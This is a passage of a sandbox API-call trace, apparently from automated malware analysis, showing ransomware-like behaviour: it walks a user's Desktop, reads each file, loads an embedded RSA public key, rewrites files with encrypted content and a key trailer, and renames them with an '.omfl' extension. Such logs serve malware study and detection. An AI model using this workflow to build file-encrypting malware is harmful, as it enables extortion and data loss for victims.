lpOverlapped=0x0) returned 1 [0130.533] CloseHandle (hObject=0x5c8) returned 1 [0130.535] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mshFbWn-Fh.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mshfbwn-fh.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mshFbWn-Fh.avi.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mshfbwn-fh.avi.omfl")) returned 1 [0130.538] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.538] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.538] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.540] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0130.540] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x932789f0, ftCreationTime.dwHighDateTime=0x1d5e603, ftLastAccessTime.dwLowDateTime=0xc1956b30, ftLastAccessTime.dwHighDateTime=0x1d5e2e9, ftLastWriteTime.dwLowDateTime=0xc1956b30, ftLastWriteTime.dwHighDateTime=0x1d5e2e9, nFileSizeHigh=0x0, nFileSizeLow=0x14b86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N tQTV7NDCW8bl354S.jpg", cAlternateFileName="NTQTV7~1.JPG")) returned 1 [0130.540] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N tQTV7NDCW8bl354S.jpg") returned=".jpg" [0130.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N tQTV7NDCW8bl354S.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n tqtv7ndcw8bl354s.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.540] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=84870) returned 1 [0130.540] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.543] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x14b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.543] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.544] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.544] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x14b86, lpOverlapped=0x0) returned 1 [0130.545] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.545] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.545] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.545] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.547] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.547] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.547] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.547] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.547] GetLastError () returned 0x0 [0130.547] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.547] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.547] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.547] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.547] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.547] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.547] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.547] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14b90) returned 0xdd2c688 [0130.548] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.548] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf3040 [0130.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16bf0 [0130.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf3088 [0130.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c08 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c38 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c50 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.549] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.549] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c38 | out: hHeap=0x4970000) returned 1 [0130.549] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c50 | out: hHeap=0x4970000) returned 1 [0130.549] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.549] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.549] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c50 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16c38 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0130.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.549] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.549] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c50 | out: hHeap=0x4970000) returned 1 [0130.549] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.549] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c38 | out: hHeap=0x4970000) returned 1 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.550] GetCurrentThreadId () returned 0x618 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5d70 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.550] GetCurrentThreadId () returned 0x618 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.550] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.551] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c38 [0130.551] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0130.551] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c50 [0130.551] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.551] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c20 [0130.551] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.551] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.551] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.551] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c68 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c38 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c38 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c38 | out: hHeap=0x4970000) returned 1 [0130.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.553] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c68 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c50 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c20 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c08 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf3088 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.554] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.554] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.554] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.554] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.554] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.554] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.554] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.554] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.554] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.554] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd2c688*, nNumberOfBytesToWrite=0x14b81, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd2c688*, lpNumberOfBytesWritten=0xe00fb14*=0x14b81, lpOverlapped=0x0) returned 1 [0130.554] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0130.554] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x14b86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.554] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.555] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.555] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.555] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: 